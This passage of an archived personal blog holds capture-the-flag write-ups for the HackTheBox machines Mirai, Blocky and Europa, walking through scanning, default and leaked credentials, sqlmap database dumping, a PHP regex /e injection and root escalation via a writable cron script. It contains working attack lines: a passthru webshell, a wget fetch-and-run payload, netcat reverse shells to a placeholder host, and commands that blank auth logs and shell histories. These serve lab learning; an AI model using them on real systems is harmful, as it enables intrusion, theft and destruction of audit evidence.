we\u0026rsquo;ve owned the system.\nThis CTF isn\u0026rsquo;t solved by running a high-tech exploit stolen from the NSA, by reverse engineering an application to find a way to inject code, or by intercepting some secret communication containing sensitive information. To capture this root flag, you\u0026rsquo;re going to need to understand how Linux works. 
You don\u0026rsquo;t need to be advanced enough to be a professional sysadmin, but you will need to be able to ask and answer the right questions about the system you are operating.\nThis write up assumes that the reader is using Kali, but any pentesting distro such as BlackArch will work.\n1. Initial Scans # nmap -F 10.10.10.48 -oA nmap_fastscan nmap finds ports for SSH, HTTP and domain. Let\u0026rsquo;s go after the HTTP and see what we can see.\nnikto -h 10.10.10.48 -o nikto_result.txt While nikto is running, we can visit the website in the browser and take a look.\nZilch. Hopefully nikto can tell us more than this blank page.\nnikto finds a few interesting tidbits:\nThe site contains the label \u0026ldquo;x pi-hole: A Black hole for Internet advertisements\u0026rdquo; /admin/index.php seems like an interesting directory We could run dirsearch to find more interesting directories, but let\u0026rsquo;s first check out what we have.\n2. Getting to the Bottom of the Pi-Hole # The term \u0026ldquo;Pi-Hole\u0026rdquo; was new to me, so I searched around online. I learned it was a program built to serve as a DNS server that simply prevents advertisements from loading. Seems like a useful system, and based on the name and iconography, it can run on a Raspberry Pi.\nThe /admin/ page contains a link named Login. Maybe we can gain access there.\nUpon first glance, I noticed that the page only asked for a password, but no username. Then, something clicked loudly in my head.\nI want to log in, but I need a password. If I log in, I will gain access to something that is likely a Raspberry Pi - an IoT device. Mirai is an extremely successful botnet that gained access by merely trying the default credentials to IoT devices. If the use of default passwords worked well enough to create a globally significant botnet, they might be good enough for us, too.\nUltimately, I found the password in a reddit post.\nThis post contained the full credentials, both username and password. 
Web access is nice, but with full creds we can go right after SSH.\nssh pi@10.10.10.48 password: raspberry 3. Privilege Escalation # Who needs hack_the_user.exe when we\u0026rsquo;ve got SSH credentials?\nls ls Desktop cat Desktop/user.txt If this really is an IoT device, we probably won\u0026rsquo;t have too much to enumerate. A Pi-hole will probably be set up to do its job, and not much else. This will not require multiple users of different privilege levels.\nMaybe our pi user can run some commands as root.\nsudo -l Our pi user can run ALL commands as root. Without a password, even.\nsudo su Who needs hack_the_root.exe when we have sudo su? So far, this CTF has been pretty easy. Perhaps too easy\u0026hellip;\nls /root cat /root/root.txt Getting a user shell was as easy as searching online for default credentials. PrivEsc was as easy as it could possibly be. We didn\u0026rsquo;t even need a password!\nNow we get to the real challenge: finding the root flag.\n4. How Do You Lose a Root Flag, Anyway? # I lost my original root.txt! I think I may have a backup on my USB stick...\nWhat do you mean, you \u0026ldquo;lost\u0026rdquo; the root flag?\nThat\u0026rsquo;s not how this is supposed to work!\nWe, the heroic pentesters, are supposed to come in with our honed skills and powerful payloads to slip through the cracks in the system and capture the flag. Mirai, all you were supposed to do was simply hold the flags and wait patiently for us to politely take them off your hands! We even got ourselves root access, and you have permission to hand it over.\nSince we successfully escalated our user privileges, you could argue that the penetration testing aspect of this CTF is over. There are no Metasploit modules to run or hashes we need to crack. We own this box, nothing is off limits.\nIt\u0026rsquo;s time to take off our pentester hats. We\u0026rsquo;re sysadmins now, and we need to use our knowledge of the filesystem to hunt down our backup root.txt file. 
But, we have to know where to look.\nOur last clue mentioned a USB Stick. By default, files stored on mounted flash drives can be found in the /media directory.\nls /media A folder called usbstick - paydirt.\nls /media/usbstick Wouldn\u0026rsquo;t our root.txt file be named root.txt? Maybe not, but damnit.txt doesn\u0026rsquo;t bode well as an alternative.\ncd /media/usbstick cat damnit.txt Tough break, James. We\u0026rsquo;ve all accidentally deleted a file. Perhaps there are more clues in this folder.\nls -la ls -la lost+found/ These two commands can be executed at the same time using ls -laR\nNo luck. There isn\u0026rsquo;t anything we can see in this directory.\nOur latest clue says James accidentally deleted the files\u0026hellip; How could James have done this on a system like ours?\nIf the system has a Desktop environment, James may have accidentally dragged the directories into the Trash. Or, it could have been an unfortunate combination of the rm command and the * character. Let\u0026rsquo;s investigate the click-and-drag theory first.\nIf the files were removed from the /media/usbstick directory and dragged into the Trash, they may still be there. I couldn\u0026rsquo;t quite remember where this trash would be located, so I ran a find command to find likely candidates.\nfind / -name \u0026quot;*Trash*\u0026quot; This command recursively searches for files and directories with Trash anywhere in their name, starting at the / directory.\nLet\u0026rsquo;s see what\u0026rsquo;s inside:\nls -la /home/pi/.local/share/Trash ls -la /home/pi/.local/share/Trash/files/ ls -la /home/pi/.local/share/Trash/expunged/ ls -la /home/pi/.local/share/Trash/info/ Using ls -laR /home/pi/.local/share/Trash/ would complete all these commands at the same time. For illustrative purposes, I have shown them one by one.\nAgain, nothing we can see. You can check the other location find found, but it\u0026rsquo;s empty as well. 
Since this possibility hinged on the fact that our IoT device was operating with a desktop environment, it was never particularly likely in the first place.\nJames probably uses SSH to access the Pi-Hole, just like we do. From his CLI, he was probably attempting to rm the contents of a subdirectory of the /media/usbstick folder and left out a few characters.\nInstead of typing something like rm -r /media/usbstick/subdirectory/*, James probably made a careless omission and typed rm -r /media/usbstick/*. This simple mistake rm\u0026rsquo;ed all the files on the USB stick, instead of the files in the subdirectory.\nThis repeated use of rm may be good news for us, surprisingly.\nrm has our system \u0026ldquo;forget\u0026rdquo; where the file is stored by deallocating its memory location. The file\u0026rsquo;s contents may still be stored on the flash drive, just without the information that allows our system to \u0026ldquo;see\u0026rdquo; the file. The file may eventually be overwritten, but if we act quickly we may be able to salvage it.\nWhile /root/root.txt has been overwritten, the backup location on the USB stick has just been deleted. The /media/usbstick directory does not contain a file named root.txt, so there is a decent chance this file was merely deallocated. After clearing the contents of the /media/usbstick directory, James likely created damnit.txt instead of altering an existing root.txt and renaming it.\nIf the backup version of root.txt containing the flag was on the USB stick - we are going to have to go one level deeper. While the drive is mounted to /media/usbstick, the drive\u0026rsquo;s filesystem is \u0026ldquo;seen\u0026rdquo; by our system as a separate device.\nOur backup file\u0026rsquo;s data has got to be on that device.\n5. Where is that USB Stick? # At this point, I theorized that we might have to use digital forensics methods to recover this information. 
However, at this point, I had no idea how that could actually be done.\nSo, I turned to my favorite resource: Ben Clark\u0026rsquo;s Red Team Field Manual. I knew that I needed to find how our system organized its filesystem and attached devices, so I simply started at the beginning of the *nix section and read descriptions until something that looked like it might fit that context appeared.\nOn the very first page of the *nix section, I found a section called Linux System Info. It seemed like the perfect place to start.\nOne line caught my eye:\ndf -h - Disk Usage(free)\nThe flash drive is a disk, right? I\u0026rsquo;d love to know how it is being used.\ndf -h A rather small, 8.7MB disk is mounted to /media/usbstick. Our system calls it /dev/sdb. I know we have a /dev directory - maybe we can just cd inside?\ncd /dev/sdb cd tells us that we aren\u0026rsquo;t dealing with a directory. file can tell us what it is.\nfile /dev/sdb I didn\u0026rsquo;t find this answer particularly informative. What am I supposed to do with a \u0026ldquo;block special\u0026rdquo; anyway?\nI\u0026rsquo;d heard the phrase \u0026ldquo;everything on Linux is a file,\u0026rdquo; so I did what I always do with files. I tried to read it.\ncat /dev/sdb This file doesn\u0026rsquo;t look like it is intended to be read by humans. This doesn\u0026rsquo;t need to stop us from trying, however. The strings command will pull out only the human-readable characters from each line.\nstrings /dev/sdb I\u0026rsquo;ve obfuscated it in the image above, but under that grey rectangle is an md5 hash.\nIt\u0026rsquo;s found right under the word root.txt. Just under that is damnit.txt, directly followed by the text that was in the damnit.txt file we read earlier.\nThis can only mean this stray hash is our root flag - especially since on HTB machines, the flag always takes the form of an md5 hash.\nFlag captured!\n6. 
Quick Cleanup and Conclusion # We\u0026rsquo;ve claimed our prize, so let\u0026rsquo;s put our pentester hats back on and cover our trail. We aren\u0026rsquo;t going to make ourselves completely invisible, but let\u0026rsquo;s use a few of the commands that the Red Team Field Manual recommends we use to cover our tracks.\nThis is optional, but it\u0026rsquo;s the polite thing to do when sharing a CTF machine with other users. We wouldn\u0026rsquo;t want to leave spoilers behind on the machine and ruin someone else\u0026rsquo;s hard work.\necho '' \u0026gt; /var/log/auth.log - replaces the authorization log with a blank file. echo '' \u0026gt; ~/.*sh_history - blanks out all shell history files for root echo '' \u0026gt; /home/pi/.*sh_history - blanks out all shell history files for pi history -c \u0026amp;\u0026amp; su pi - clears the command history for root and switches to the pi user history -c \u0026amp;\u0026amp; kill -9 $$ - clears the command history for pi and exits the box The RTFM uses echo '' \u0026gt; ~/.bash_history, which is slightly different from what I like to use. Using .*sh_history will blank out all shell history files, not just bash.\nMirai was the second CTF I ever completed, and I got a lot out of it. Wandering almost completely blindly into the world of CTFs, I had no concept of what I was going to need to learn and what concepts would arise. This box demonstrated that we aren\u0026rsquo;t always just looking to become a root user, but sometimes we have to act like one.\nThanks for reading! # ","date":"10 January 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/mirai-htb/","section":"Archive","summary":"","title":"CTF Writeup: Mirai on HackTheBox","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # Blocky is a fun beginner\u0026rsquo;s box that was the second or third CTF I ever attempted. 
At that time, I had booted up Kali and knew that a couple of tools existed, but had very few strategies, context or experience. All the boxes I had solved so far had used default passwords or simply were CVE-2017-0144 insta-rooted with Metasploit.\nThis box will begin to give you a good understanding of the power of the tools at your disposal. By stumbling around trying out tools that I saw were part of the Kali suite, I began to figure out the important concepts and found myself learning very quickly.\nIf you have never tried a CTF before, this box would be a nice place to start - assuming you can get past the HackTheBox Invite process.\nThis write up assumes that the reader is using Kali, but any pentesting distro such as BlackArch will work. The tools come with a stock Kali installation, unless otherwise mentioned.\n1. Initial Scans # All HackTheBox CTFs are black-box. All we have is an IP. IPs should be scanned with nmap.\nnmap -sV -T4 10.10.10.37\nThe -sV flag attempts to tell us the software used on each port found The -T4 flag tells nmap to use more CPU threads, and thus run faster nmap finds 21, 22, and 80. These are the default ports for FTP, SSH and HTTP. It also finds 8192, but we can come back to that later if we stall. I like to start with HTTP.\nKali categorizes most of the HTTP tools under \u0026ldquo;Web Application Analysis,\u0026rdquo; so I took a peek and tried to get most of them working. Since starting out, I found that the most useful tools to start with on web page CTFs are nikto and dirsearch.\nnikto -h http://10.10.10.37 -output nikto_blocky.txt\nOur -h flag tells nikto the location of our target, and the -output flag creates an easily revisited log of the results.\nMy nikto scan didn\u0026rsquo;t actually finish until after my dirsearch, and ended up not telling me anything dirsearch didn\u0026rsquo;t tell me already. 
This will not always be the case, so I often run both.\ndirsearch is a web directory bruteforcer implemented in python3. Alternatively, you can use dirb or dirbuster, which come with Kali, or another program such as gobuster.\nI cloned it using\ngit clone https://github.com/maurosoria/dirsearch /opt/dirsearch\nand ran it with\npython3 /opt/dirsearch/dirsearch -u \u0026quot;http://10.10.10.37\u0026quot; -e sh,txt,php,html,htm,zip,tar.gz,tar --plain-text-report=dirsearch_europa_http_quick -t 25\n-u points to our URL starting point -e lists some common file extensions to look for. Most of the time php,html,txt is enough --plain-text-report= specifies that we want to save the results to file -t 25 allocates dirsearch more threads We find a whole bunch of paths that look interesting. The fact that we have directories that begin with wp-... is a good place to start. This means our site runs on Wordpress, which is associated with quite a few vulnerabilities. The WPScan tool will help us find any that are present on this site.\nwpscan -u http://10.10.10.37 -e uvp | tee wpscan_block.txt\nThe -e uvp flag enumerates users and looks for vulnerable plugins, and | tee ... saves the output to a file we can come back to later.\nWPScan finds many, many vulnerabilities we can dive into, but let\u0026rsquo;s keep enumerating to make sure we get the full lay of the land.\n2. Using our Reconnoitered Information to Dig Deeper # Let\u0026rsquo;s review what we have so far:\nWe\u0026rsquo;ve found the username notch We\u0026rsquo;ve found 2 places to log in on the site, phpmyadmin and wp-login A 3rd login exists at SSH. If we get phpmyadmin database access, we may be able to find some credentials to log in somewhere else, or drop in some kind of reverse shell. If we get Wordpress admin access, we can spawn a reverse shell pretty easily.\nMaybe the site has some more useful information. It looks like a simple Wordpress blog with only one post. 
Let\u0026rsquo;s read it.\n\u0026quot;\u0026hellip;developing a wiki system\u0026hellip; and a core plugin\u0026hellip;\u0026quot; Perhaps some of that is already deployed to the site. Let\u0026rsquo;s revisit our dirsearch results.\nWe have both the /wp-content/plugins folder, where wpscan found the akismet plugin, and a separate /plugins directory.\nThis is atypical for a Wordpress site, and somewhat suspicious. Why would it have both?\nTwo .jars are here for us to download. The Core plugin was mentioned in the blog post, so let\u0026rsquo;s start there.\nwget http://10.10.10.37/plugins/files/BlockyCore.jar unzip BlockyCore.jar -d blockycore\ncd blockycore ls -laR *\nI don\u0026rsquo;t know too much about Java, but Blockycore.class may have something for us. Can we just read it and find something interesting?\ncat com/myfirstplugin/BlockyCore.class\nThis file appears to have been compiled and has some lines we can\u0026rsquo;t read. We can isolate the human-readable parts with the strings command.\nstrings com/myfirstplugin/BlockyCore.class\nThere are some strings that look useful, but it\u0026rsquo;s hard to tell without more context.\nI did some online searching and came across the javap command, which can be used to disassemble Java classes. I believe I had to install it using apt-get\njavap -c com/myfirstplugin/BlockyCore.class | tee ~/CTF/blocky/blockycore_disassembled.txt\nThat\u0026rsquo;s the kind of detail I like to see! sqluser and sqlpass are VERY promising. These credentials will likely get us into the phpmyadmin database, and might even be re-used elsewhere.\n3. Gaining Webserver Access # When I first attempted this box, I got stuck here for a few hours. I knew I was missing something very simple, but couldn\u0026rsquo;t find my way through all the information I had at my disposal. 
The pieces were too disorganized to fit together.\nWhat I should have done was get things clearly laid out by taking another inventory of all that had been found.\nSo far, we have:\nUsernames:\nnotch - from the WP site root - exists by default for SSH and phpmyadmin, seen in plugin code admin - exists by default on Wordpress Passwords:\n8YsqfCTnvxAUeduzjNSXe22 - from the plugin code and\nLogin Areas:\nWordpress phpmyadmin ssh Let\u0026rsquo;s try root:8YsqfCTnvxAUeduzjNSXe22 as phpmyadmin credentials.\nGreat, we\u0026rsquo;re in the database. Odds are we are going to find hashes here that will lead to the Wordpress password. Before we go trying to find and crack them, however, let\u0026rsquo;s keep it simple. We should first try logging in with our credentials somewhere else.\nI\u0026rsquo;m feeling optimistic; I say we go right for the big fish - root via SSH.\nssh root@10.10.10.37\nand give the password when asked.\nDidn\u0026rsquo;t hurt to try, as unlikely as it was. Since we only have a few usernames, and only one password candidate, it is feasible to simply try them all. Since SSH access is easier to work with than a webshell, let\u0026rsquo;s try to get in here before trying wp-admin access.\nssh notch@10.10.10.37\nWe\u0026rsquo;re in!\n4. Capturing the User Flag # ls /home ls -la /home/notch cat /home/notch/user.txt\nA little prior knowledge tells me that Notch is the inventor and boss of the Minecraft universe - Could this mean he is the admin of this system? Let\u0026rsquo;s find out what we can run as superuser.\nYup, he\u0026rsquo;s an admin. This could be all we need to know to gain root access.\nsudo su\nWe have a root shell, and it feels good.\n5. Call Me Markus # From here, it is as simple as reading the root flag.\nls /root cat /root/root.txt\nSuccess! Grab the root flag and let\u0026rsquo;s clean up.\nNOTE: These are some pretty simple cleanup commands meant to cover our tracks a little bit, but only a little bit. 
A trained admin would notice that these files have been altered, so look at these commands as the beginning of your tracks-covering career and not as a MIB-Style mind wipe.\necho '' \u0026gt; /home/notch/.bash_history echo '' \u0026gt; /var/log/auth.log echo '' \u0026gt; /var/www/admin/logs/access.log echo '' \u0026gt; /root/.bash_history\nExit the root shell with\nhistory -c \u0026amp;\u0026amp; kill -9 $$\nRepeat this command as notch, and you\u0026rsquo;re all done.\nPost-Mortem # This box was an easy target because of insecure setup, not any vulnerable applications that we had to exploit.\nInformation Disclosure via Hard Coded Credentials\nBlocky-Core.jar disclosed sqlpass\nInformation doesn\u0026rsquo;t get much more sensitive than a superuser password, and ours was found practically in the clear in a publicly accessible file.\nCredential Reuse\nsqlpass was the same as the user password for notch\nThere was no good reason why notch\u0026rsquo;s user password needed to be the same as the sqlpass.\nThanks to HackTheBox and Arrexel!\n","date":"9 December 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/blocky-htb/","section":"Archive","summary":"","title":"CTF Writeup: Blocky on HackTheBox","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # Solving this box was a great example of my learning process - trial by fire. I\u0026rsquo;ve been attempting to do tons of CTFs, whether I am ready for them or not. I often run into the limits of my knowledge, and often fail to conquer the box on the first try. This method is summed up by a phrase I\u0026rsquo;ve borrowed from a Childish Gambino song: \u0026ldquo;I did everything I could, then I kept going.\u0026rdquo;\nEssentially, this method consists of trying everything I know how to do while being ready for the possibility that I will need to use knowledge I do not have. At least, knowledge I did not have when I began the CTF. 
I then try to scour the web for details on where I think the holes in my knowledge lie. If I can\u0026rsquo;t find them, I\u0026rsquo;ll put the CTF down for a while, learn somewhere else and return when I think I\u0026rsquo;ve found something.\nOn this box, I was introduced to some concepts that were new to me, but found a way to learn about them on the fly and eked out some kind of solution. I\u0026rsquo;m not sure if my process was the most efficient, elegant, or professional, but at the end of the day, I had the root flag.\nThis CTF is from HackTheBox, which requires the solving of a mini-CTF in order to join. I think the invitation process is more difficult than some of the beginner VMs, in fact.\nThis write up is not meant to be an introduction to Pentesting. It shows my process and assumes the reader has beginner-intermediate knowledge. I use Kali, but any Pentesting-ready distro, such as BlackArch, will have or can get the tools to get the job done.\n1. Initial Scans # Like all HTB Machines, we have a black box test. All we have is an IP and a nickname - so we need to scan, scan, scan.\nI\u0026rsquo;ve started to formalize my process in an attempt to be more methodical. On my Pentesting box, I have a \u0026ldquo;CTFs\u0026rdquo; directory at /root/CTFs - this is where I put the working directory for a given attempt at a system.\nThe next formalization step is the use of some custom scripting for efficiency\u0026rsquo;s sake. My nmap process begins with my benmap.sh script, which aggregates my most commonly used nmap commands.\nFirst, it creates the ~/CTFs/BOXNAME directory, and opens a new file called NOTES_BOXNAME.txt in gedit.\nNext, it runs nmap with the -F flag to find the commonly used ports. 
In the likely event that we find something here, we can dive right in.\nIt saves the found ports to a file, then runs with -sV targeting the found ports to identify the versions used.\nThis output is saved to some files called nmap_BOXNAME_fastports.gmap, .nmap and .xml\nThis process is repeated with a scan of all TCP ports. nmap finds the open ports, outputs them to a file, then runs with -sV that targets only the found ports and outputs a file with their versions.\nLastly, it runs with the --script=vuln flag to find some vulnerabilities on the ports found with the TCP scan. Only the found ports are targeted.\nUsually, we can get started after the fastport scan. It is not a particularly complicated script, but if you are interested, check it out.\n./benmap.sh europa 10.10.10.22\nFastports finds SSH, HTTP and HTTPS.\nnikto and dirsearch constitute my opening salvo for HTTP, which is where I like to start.\nnikto -h http://10.10.10.22 -output nikto_europa_http.txt dirsearch -u \u0026quot;http://10.10.10.22\u0026quot; -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar --plain-text-report=dirsearch_europa_http_quick -t 25\nNeither scan turns up anything particularly interesting. Let\u0026rsquo;s try the eyeball scan.\nVisiting the site in the browser doesn\u0026rsquo;t show much either, at least when we use HTTP. Perhaps we can learn something from the HTTPS site.\nInvalid SSL certificate, eh? Probably self-signed. Let\u0026rsquo;s see what it says, maybe it has some useful info.\nThe cert is for www.europacorp.htb and admin-portal.europacorp.htb. Admin-portal sounds the most interesting, so let\u0026rsquo;s add it to a line in the /etc/hosts file.\n10.10.10.22 admin-portal.europacorp.htb\nThere may be more useful information in the certificate. First, we click \u0026ldquo;Add Exception\u0026rdquo; and then \u0026ldquo;Confirm Security Exception\u0026rdquo; - BE VERY CAREFUL DOING THIS IN REAL LIFE. 
Since we are dealing with a closed system CTF, it is okay this time.\nNext, click the lock next to the URL bar, then click the right-facing dropdown arrow, followed by the \u0026ldquo;More Information\u0026rdquo; button. This brings up an information window page in the browser.\nClick \u0026ldquo;View Certificate\u0026rdquo; to bring it up, and let\u0026rsquo;s see if we can find anything else interesting. Hit the \u0026ldquo;Details\u0026rdquo; tab to find a series of drop-downs.\nThe only thing that seems interesting to me here is the issuer: admin@europacorp.htb - a nice username for us to try.\nLet\u0026rsquo;s visit our juicy-sounding admin-portal at\nhttps://admin-portal.europacorp.htb/\nYou may need to allow the certificate again.\n2. Gaining Website Admin Access # We need to find an email and password to login with. The certificate gave us the email address admin@europacorp.htb. We could try to brute-force the password, but there is plenty to attempt before we are forced to try that.\nIf we view the source of the page, we\u0026rsquo;ll see the word \u0026ldquo;form\u0026rdquo; pop up repeatedly. It was pretty evident we were looking at a login form before, but now we have confirmed it.\nA trick I like to employ when we have a login page like this is the --form flag in sqlmap\nsqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form --dbs --batch\nA db called \u0026ldquo;admin\u0026rdquo; is very appealing.\nsqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form -D admin --all --batch\n2 usernames and password hashes!\nNot only that, but it seems the passwords have the same hash! It looks like MD5 to me, so let\u0026rsquo;s check it with HashBuster.\nI have the distinct feeling this is the path the CTF\u0026rsquo;s author wanted us to take.\nFor simplicity\u0026rsquo;s sake, let\u0026rsquo;s try ssh with our usernames. 
john, admin and root.\nNo luck, but we\u0026rsquo;d be silly not to try.\nLet\u0026rsquo;s log into the site with our newfound credentials.\n3. Exploiting the Website # There\u0026rsquo;s plenty that looks clickable - but not much seems to actually be clickable. The only link that takes us to a new page was \u0026ldquo;Tools\u0026rdquo;\nWhat have we here? The OpenVPN Configuration generator? I know we use an OpenVPN configuration to connect to the HackTheBox VPN - do we need to connect to another VPN to get root access? Is this just the starting machine of a network we need to infiltrate?\nI chased down some of these options for a while, with no luck. I tried putting in my HTB VPN IP address and copying down the \u0026ldquo;Configuration File\u0026rdquo; generated by this page. Starting an OpenVPN connection using that file didn\u0026rsquo;t do anything.\nGetting nowhere, I decided to look at the page\u0026rsquo;s source code. I saw plenty of code that would format to the widgets on the page, but nothing that looked like it drove the \u0026ldquo;Configuration Generator.\u0026rdquo; In order to get a better understanding of what\u0026rsquo;s happening here, we should use a proxy and intercept some requests to see what was going on behind the scenes.\nIf you don\u0026rsquo;t know how to set up ZAP as a proxy, check out my writeup for ZorZ.\nFirst, I typed in the word HELLO into the \u0026ldquo;IP Address of Remote Host\u0026rdquo; box to see where this was worked into the generated configuration.\nIn ZAP, I set a break-point here, and repeated the process.\nBefore decoding, we can recognize the words pattern ip_address ipaddress HELLO and text.\nWe can use ZAP to decode this from URL-style to get text beginning with\npattern=/ip_address/\u0026amp;ipaddress=HELLO\u0026amp;text=\u0026quot;openvpn\u0026quot;: {\nThe pattern= parameter makes me think we are telling the server that the inputted text matches a certain previously determined format, in this case an IP 
address. This pattern\u0026rsquo;s name, ip_address is encased in / characters. Since our page ends in .php - we can guess this is some sort of PHP syntax.\nAs of this writing, I do not understand much PHP syntax. Outside of my favorite microshell\u0026hellip;\n\u0026lt;?php passthru($_GET[\u0026quot;cmd\u0026quot;]); ?\u0026gt;\n\u0026hellip;I don\u0026rsquo;t know much. Why not try inputting some sort of passthru command as our text?\nI\u0026rsquo;ll alter the microshell and insert a simple whoami command within the passthru.\n\u0026lt;?php passthru(\u0026quot;whoami\u0026quot;); ?\u0026gt;\nIf we have code execution, we should simply see a username appear on the page.\nThis doesn\u0026rsquo;t seem to do much, the page just loads and doesn\u0026rsquo;t even include our string. Doesn\u0026rsquo;t look like we can just paste PHP code\u0026hellip; wait, if it\u0026rsquo;s already PHP - why not just inject the commands without PHP tags?\nWe\u0026rsquo;ll try again, but this time just use\npassthru(\u0026quot;whoami\u0026quot;)\nThis gets us\u0026hellip;\nNot code execution, but we did successfully get our string to replace all instances of \u0026ldquo;ip_address.\u0026rdquo; At the moment, it looks like the limiting factor is my knowledge of PHP.\nLet us go beseech the great oracle for knowledge.\nregex syntax\u0026hellip; of course! We are taking the strings matching a pattern called \u0026ldquo;ip_address\u0026rdquo; and replacing it with a newly inputted string. This sounds exactly like regular expression usage. I\u0026rsquo;ve done this thousands of times for my wordlist projects, why didn\u0026rsquo;t it come to me sooner?\nIf we assume the site uses PHP regex, so what? How can we use this? Maybe we can find some sort of exploit. Let us beseech the oracle once again. 
A quick search for \u0026ldquo;PHP Regex exploit\u0026rdquo; takes us to an article about PHP regex vulnerabilities- if I recall correctly, MadIrish is the creator of the LampSec CTF challenges, of which I am a big fan.\nAfter reading the page, I think I understand what is happening. If our page is using a certain PHP function to find and replace strings, we will be able to inject some commands by simply adding a single-letter flag. The important bits are found here\nand here.\nExecuting arbitrary commands with the privileges of a webserver sounds exactly like mischief I\u0026rsquo;d like to cause. It seems that if we can simply add e to our request in the right spot, we should be able to execute commands that output to the web page.\nLooking at the example in the 2nd image from the MadIrish article, we see that the replacement string is defined with $string - this seems like it would be analogous to ipaddress parameter in our request. That means the regex to be replaced falls under the pattern parameter, which is where we need to put the e flag. Let\u0026rsquo;s give it a try.\nBefore, our request began with\npattern=/ip_address/\u0026amp;ipaddress=HELLO\u0026amp;text=\u0026quot;openvpn\u0026quot;: {\nLet\u0026rsquo;s edit this to\npattern=/ip_address/e\u0026amp;ipaddress=passthru(\u0026quot;whoami\u0026quot;)\u0026amp;text=\u0026quot;openvpn\u0026quot;: { ...\nWhich in URL-speak, comes out to look like\npattern=%2Fip_address%2Fe\u0026amp;ipaddress=passthru%28%22whoami%22%29\u0026amp;text=%22openvpn%22%3A ...\nand send our request.\nAfter we step through, we see our web page has responded to our command!\nWe have remote code execution!\nOur command executed twice; we don\u0026rsquo;t want that. This happened because ip_address appears twice in the text that is being operated on, so it is replaced twice. If we change our string to something that only appears once, our code will only execute once. 
Use the string nobody.\nI tried to execute some reverse shell scripts, but wasn\u0026rsquo;t successful the first few times. Eventually, I got it to work by using a favorite trick of mine: hosting a reverse shell script on my own system using a Python Simple HTTP Server, downloading the script to a universally writable directory on the CTF Box, making this script executable and running it. I explain this in depth in the Bulldog CTF Writeup.\nEventually, I was able to get my shell using the netcat without e shell from Ben Clark\u0026rsquo;s Red Team Field Manual.\nWithin my local ~/CTFs/europa directory, I ran\necho \u0026quot;rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc local.machine.ip.addr SHELLPORT \u0026gt; /tmp/f\u0026quot; \u0026gt; script.sh\nAfter setting up my listener and Python Server, I prepared the PHP command,\npassthru(\u0026quot;cd /tmp; wget http://local.machine.ip.addr:hostport/script.sh; chmod +x script.sh; sh script.sh\u0026quot;)\nThen URL encoded and injected it from within ZAP, remembering to include my e flag. (Okay, I forgot the flag the first time.)\npassthru%28%22cd+%2Ftmp%3B+wget+http%3A%2F%2Flocal.machine.ip.addr%3AHOSTPORT%2Fscript.sh%3B+chmod+%2Bx+script.sh%3B+sh+script.sh%22%29\nOur shell pops!\n4. Getting the User Flag and Privilege Escalation # On HackTheBox CTFs, the user flag is kept in a /home/USERNAME directory.\nls /home/ ls /home/john cat /home/john/user.txt\nWith the user flag in hand, it\u0026rsquo;s time to enumerate and gain privileges.\nAfter checking for some simple things like hidden files in the user directories, I didn\u0026rsquo;t find anything glaringly obvious. For webservers like this box, I like to check the website folders to make sure I\u0026rsquo;ve seen everything the site had to offer. This can often include databases or other files that contain credentials that might be re-used. 
These are usually found in the /var/www directory, so let\u0026rsquo;s take a look.\ncd /var/www ls -la\nSome very interesting leads - admin, cronjobs and a folder called cmd that we can edit, but is owned by root. Cronjobs often run as root, and can sometimes be misconfigured to interact with a file a lesser user such as ourselves can edit.\ncd cronjobs ls -la cat clearlogs\nInteresting, the cronjob calls a file called /var/www/cmd/logcleared.sh - wasn\u0026rsquo;t cmd the folder we had write access to?\nI see a strategy forming.\nThe root-owned cronjob clearlogs executes the contents of /var/www/cmd/logcleared.sh. We have write access to /var/www/cmd/, so we just need to make a script of our own called logcleared.sh and it will run as root automatically on a periodic basis.\nIf we create a reverse shell script, it will run as root and we will be the big bad boss of the box.\ncd ../cmd ls -la\nSince our shell is limited, and my go-to method of getting a TTY using python is off the table (I didn\u0026rsquo;t find python3 on this box until afterwards) - we should write our script on our local machine and then download it using wget like we did before.\nDue to the use of certain characters, I found it easiest to write this script in a full text editor like vim or gedit.\n#!/bin/sh rm /tmp/fa; mkfifo /tmp/fa; cat /tmp/fa|/bin/sh -i 2\u0026gt;\u0026amp;1|nc local.machine.ip.addr ROOTPORT \u0026gt; /tmp/fa and save it as logcleared.sh\nThen, using the same python HTTP Server, use wget on the europa-user shell to download our custom-made logcleared.sh.\nBefore doing this, make sure your listener is active. You wouldn\u0026rsquo;t want to miss the cronjob!\nOn Europa, run\nwget http://local.machine.ip.addr:hostport/logcleared.sh chmod +x logcleared.sh\nNow, we wait. If it takes more than a few minutes, you\u0026rsquo;ve done something wrong. Check your IPs, ports, etc.\nI just love to see that #.\n5. Root Flag and Cleanup # We\u0026rsquo;ve done it. 
Grab the root flag with\u0026hellip;\ncat /root/root.txt\n\u0026hellip;and if you want, you can be done here. I\u0026rsquo;m going to clean up after myself and remove a few traces of my presence here. NOTE: I am not doing this in the stealthiest way possible. I\u0026rsquo;m doing this to form good habits, but do not see this as an example of a phantom-like disappearance.\ncd /tmp; rm f fa script.sh echo '' \u0026gt; /var/www/cmd/logcleared.sh \u0026amp;\u0026amp; rm /var/www/cmd/logcleared.sh echo '' \u0026gt; /home/john/.bash_history echo '' \u0026gt; /var/log/auth.log echo '' \u0026gt; /var/www/admin/logs/access.log\nIf you want to copy down the user password hashes to attempt to crack them, copy them from cat /etc/shadow | grep '\\$' | cut -d ':' -f -2.\nGood luck cracking, these boxes are designed for this to not be easy.\nIn both your user and root shells, exit with\nkill -9 $$\nThanks to HackTheBox and ch4p for a fun box.\nThanks for reading! # ","date":"2 December 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/europa-htb/","section":"Archive","summary":"","title":"CTF Writeup: Europa on HackTheBox","type":"archive"},{"content":" This \u0026ldquo;CTF\u0026rdquo; is more of a vulnerability sandbox than a true Capture the Flag challenge. However, it is a great way to explore some WebApp Upload vulnerabilities.\nThe VulnHub description says:\nThis machine will probably test your web app skills once again. There are 3 different pages that should be focused on (you will see!) If you solve one or all three pages, please send me an email and quick write up on how you solved each challenge. Your goal is to successfully upload a webshell or malicious file to the server. If you can execute system commands on this box, thats good enough!!! I hope you 